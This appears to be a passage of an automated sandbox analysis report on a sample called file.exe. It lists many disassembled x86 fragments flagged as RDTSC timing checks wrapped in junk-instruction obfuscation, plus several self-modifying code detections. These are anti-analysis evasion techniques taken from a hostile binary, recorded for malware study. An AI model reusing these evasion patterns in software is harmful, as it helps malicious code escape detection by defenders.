Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72603B0 second address: 72603F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F70F0BCDB18h 0x00000017 jmp 00007F70F0BCDB15h 0x0000001c popfd 0x0000001d mov di, cx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72603F4 second address: 7260409 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 mov cx, EDFBh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push dword ptr [eax+18h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260409 second address: 726040D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726040D second address: 7260411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260411 second address: 7260417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726044C second address: 7260487 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F70F070E5D8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260487 second address: 7260496 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260496 second address: 72604BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F70F070E5D9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72604BC second address: 72604C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72604C1 second address: 72604C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72604C7 second address: 7260538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 je 00007F715F29CCE0h 0x0000000d pushad 0x0000000e mov ax, di 0x00000011 pushfd 0x00000012 jmp 00007F70F0BCDB0Bh 0x00000017 adc ah, FFFFFFBEh 0x0000001a jmp 00007F70F0BCDB19h 0x0000001f popfd 0x00000020 popad 0x00000021 sub eax, eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F70F0BCDB13h 0x0000002c add ah, FFFFFFCEh 0x0000002f jmp 00007F70F0BCDB19h 0x00000034 popfd 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260538 second address: 7260589 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F70F070E5D0h 0x00000008 sbb esi, 48A67048h 0x0000000e jmp 00007F70F070E5CBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushfd 0x00000019 jmp 00007F70F070E5D6h 0x0000001e add ax, B2A8h 0x00000023 jmp 00007F70F070E5CBh 0x00000028 popfd 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260589 second address: 72605DC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F70F0BCDB18h 0x00000008 adc eax, 55E9A508h 0x0000000e jmp 00007F70F0BCDB0Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr [esi], edi 0x00000019 jmp 00007F70F0BCDB16h 0x0000001e mov dword ptr [esi+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov bl, 9Bh 0x00000026 push eax 0x00000027 pop edx 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72605DC second address: 72605EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72605EE second address: 7260687 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+08h], eax 0x0000000e pushad 0x0000000f call 00007F70F0BCDB14h 0x00000014 mov ah, DDh 0x00000016 pop edi 0x00000017 mov cl, 67h 0x00000019 popad 0x0000001a mov dword ptr [esi+0Ch], eax 0x0000001d jmp 00007F70F0BCDB0Fh 0x00000022 mov eax, dword ptr [ebx+4Ch] 0x00000025 pushad 0x00000026 mov cl, 7Ah 0x00000028 pushfd 0x00000029 jmp 00007F70F0BCDB11h 0x0000002e xor ecx, 63D022F6h 0x00000034 jmp 00007F70F0BCDB11h 0x00000039 popfd 0x0000003a popad 0x0000003b mov dword ptr [esi+10h], eax 0x0000003e jmp 00007F70F0BCDB0Eh 0x00000043 mov eax, dword ptr [ebx+50h] 0x00000046 pushad 0x00000047 mov cx, F0ADh 0x0000004b push ecx 0x0000004c mov ax, bx 0x0000004f pop edi 0x00000050 popad 0x00000051 mov dword ptr [esi+14h], eax 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260687 second address: 726069F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F70F070E5D3h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726069F second address: 72606F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c jmp 00007F70F0BCDB0Eh 0x00000011 mov dword ptr [esi+18h], eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushfd 0x00000018 jmp 00007F70F0BCDB0Ch 0x0000001d xor si, 7338h 0x00000022 jmp 00007F70F0BCDB0Bh 0x00000027 popfd 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72606F1 second address: 726075F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dx, cx 0x0000000c popad 0x0000000d mov eax, dword ptr [ebx+58h] 0x00000010 pushad 0x00000011 mov ebx, esi 0x00000013 mov cl, 7Bh 0x00000015 popad 0x00000016 mov dword ptr [esi+1Ch], eax 0x00000019 pushad 0x0000001a call 00007F70F070E5D7h 0x0000001f mov bx, si 0x00000022 pop eax 0x00000023 push ebx 0x00000024 call 00007F70F070E5D0h 0x00000029 pop eax 0x0000002a pop edx 0x0000002b popad 0x0000002c mov eax, dword ptr [ebx+5Ch] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F70F070E5CDh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726075F second address: 7260764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260764 second address: 7260777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esi+20h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260777 second address: 726077B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726077B second address: 726077F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726077F second address: 7260785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260785 second address: 726079F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5D6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726079F second address: 72607CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+60h] 0x0000000e pushad 0x0000000f mov bx, cx 0x00000012 mov ecx, 0E49C8C7h 0x00000017 popad 0x00000018 mov dword ptr [esi+24h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e movsx edx, si 0x00000021 mov bx, si 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72607CA second address: 7260866 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 movzx esi, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebx+64h] 0x0000000f pushad 0x00000010 mov cl, dh 0x00000012 jmp 00007F70F070E5D6h 0x00000017 popad 0x00000018 mov dword ptr [esi+28h], eax 0x0000001b jmp 00007F70F070E5D0h 0x00000020 mov eax, dword ptr [ebx+68h] 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F70F070E5CEh 0x0000002a or ch, 00000068h 0x0000002d jmp 00007F70F070E5CBh 0x00000032 popfd 0x00000033 jmp 00007F70F070E5D8h 0x00000038 popad 0x00000039 mov dword ptr [esi+2Ch], eax 0x0000003c jmp 00007F70F070E5D0h 0x00000041 mov ax, word ptr [ebx+6Ch] 0x00000045 pushad 0x00000046 mov ah, bh 0x00000048 popad 0x00000049 mov word ptr [esi+30h], ax 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260866 second address: 726086C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726086C second address: 7260872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260872 second address: 7260876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260876 second address: 726087A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726087A second address: 726089B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+00000088h] 0x0000000f pushad 0x00000010 mov di, ax 0x00000013 mov dl, cl 0x00000015 popad 0x00000016 mov word ptr [esi+32h], ax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov bx, ax 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 726089B second address: 72608AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7260973 second address: 72609E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F70F0BCDB17h 0x00000009 sub cx, 79BEh 0x0000000e jmp 00007F70F0BCDB19h 0x00000013 popfd 0x00000014 mov ah, 9Bh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push 00000001h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F70F0BCDB14h 0x00000024 sbb cx, 29E8h 0x00000029 jmp 00007F70F0BCDB0Bh 0x0000002e popfd 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72609E0 second address: 72609E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72609E6 second address: 72609EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72609EA second address: 72609EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72609EE second address: 7260A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F70F0BCDB0Ah 0x0000000e mov dword ptr [esp], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F70F0BCDB17h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 724091E second address: 7240931 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F70F070E5CEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7240931 second address: 724093F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 724093F second address: 7240943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7240943 second address: 7240949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7240949 second address: 7240964 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7240964 second address: 72409A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F70F0BCDB13h 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F70F0BCDB16h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F70F0BCDB0Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72409A4 second address: 72409AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72409AA second address: 7240A1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F70F0BCDB0Ah 0x0000000b or ch, FFFFFF98h 0x0000000e jmp 00007F70F0BCDB0Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F70F0BCDB0Bh 0x00000021 xor cl, 0000005Eh 0x00000024 jmp 00007F70F0BCDB19h 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F70F0BCDB10h 0x00000030 and ch, 00000058h 0x00000033 jmp 00007F70F0BCDB0Bh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7240A1A second address: 7240A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7240A20 second address: 7240A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250AB8 second address: 7250AD0 instructions: 0x00000000 rdtsc 0x00000002 call 00007F70F070E5CBh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250AD0 second address: 7250AD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250AD6 second address: 7250B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 0DBD9375h 0x00000008 call 00007F70F070E5D2h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], ebp 0x00000014 pushad 0x00000015 call 00007F70F070E5D7h 0x0000001a pushfd 0x0000001b jmp 00007F70F070E5D8h 0x00000020 sbb eax, 1AC95A58h 0x00000026 jmp 00007F70F070E5CBh 0x0000002b popfd 0x0000002c pop eax 0x0000002d pushfd 0x0000002e jmp 00007F70F070E5D9h 0x00000033 or esi, 30C095F6h 0x00000039 jmp 00007F70F070E5D1h 0x0000003e popfd 0x0000003f popad 0x00000040 mov ebp, esp 0x00000042 jmp 00007F70F070E5CEh 0x00000047 push dword ptr [ebp+04h] 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F70F070E5D7h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250B9A second address: 7250BA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250BA0 second address: 7250BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250BA4 second address: 7250BA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0A32 second address: 72C0A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0A36 second address: 72C0A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0A3C second address: 72C0A88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F70F070E5CEh 0x00000012 jmp 00007F70F070E5D5h 0x00000017 popfd 0x00000018 call 00007F70F070E5D0h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0A88 second address: 72C0AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dl, byte ptr [ebp+14h] 0x00000009 jmp 00007F70F0BCDB17h 0x0000000e mov eax, dword ptr [ebp+10h] 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0AAF second address: 72C0B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F70F070E5D0h 0x0000000a add ax, 9508h 0x0000000f jmp 00007F70F070E5CBh 0x00000014 popfd 0x00000015 popad 0x00000016 pushfd 0x00000017 jmp 00007F70F070E5D8h 0x0000001c adc eax, 6AAE3768h 0x00000022 jmp 00007F70F070E5CBh 0x00000027 popfd 0x00000028 popad 0x00000029 and dl, 00000007h 0x0000002c pushad 0x0000002d mov edi, ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F70F070E5CEh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0B18 second address: 72C0B28 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0B28 second address: 72C0B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0B2C second address: 72C0B32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0B32 second address: 72C0B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0B42 second address: 72C0B8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F71607F31A5h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F70F0BCDB0Bh 0x0000001a xor si, 3D6Eh 0x0000001f jmp 00007F70F0BCDB19h 0x00000024 popfd 0x00000025 mov di, cx 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0B8B second address: 72C0BA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5D8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0BA7 second address: 72C0BCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, 00000000h 0x0000000d jmp 00007F70F0BCDB0Ch 0x00000012 inc ecx 0x00000013 pushad 0x00000014 mov dx, ax 0x00000017 popad 0x00000018 shr eax, 1 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0BCE second address: 72C0BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0BD2 second address: 72C0BD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0BD6 second address: 72C0BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0BDC second address: 72C0BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB16h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72C0BF6 second address: 72C0A32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7160333B99h 0x0000000d jne 00007F70F070E5BDh 0x0000000f inc ecx 0x00000010 shr eax, 1 0x00000012 jne 00007F70F070E5BDh 0x00000014 imul ecx, ecx, 03h 0x00000017 movzx eax, dl 0x0000001a cdq 0x0000001b sub ecx, 03h 0x0000001e call 00007F70F071EABDh 0x00000023 cmp cl, 00000040h 0x00000026 jnc 00007F70F070E5D7h 0x00000028 cmp cl, 00000020h 0x0000002b jnc 00007F70F070E5C8h 0x0000002d shld edx, eax, cl 0x00000030 shl eax, cl 0x00000032 ret 0x00000033 or edx, dword ptr [ebp+0Ch] 0x00000036 or eax, dword ptr [ebp+08h] 0x00000039 or edx, 80000000h 0x0000003f pop ebp 0x00000040 retn 0010h 0x00000043 push ebp 0x00000044 push 00000001h 0x00000046 push edx 0x00000047 push eax 0x00000048 call edi 0x0000004a mov edi, edi 0x0000004c jmp 00007F70F070E5D2h 0x00000051 xchg eax, ebp 0x00000052 jmp 00007F70F070E5D0h 0x00000057 push eax 0x00000058 jmp 00007F70F070E5CBh 0x0000005d xchg eax, ebp 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F70F070E5D0h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A0E34 second address: 72A0E46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A0E46 second address: 72A0E59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F070E5CFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72A0E59 second address: 72A0E5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: BDFAD8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D8DA07 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: BDF9B7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E17F16 instructions caused by: Self-modifying code
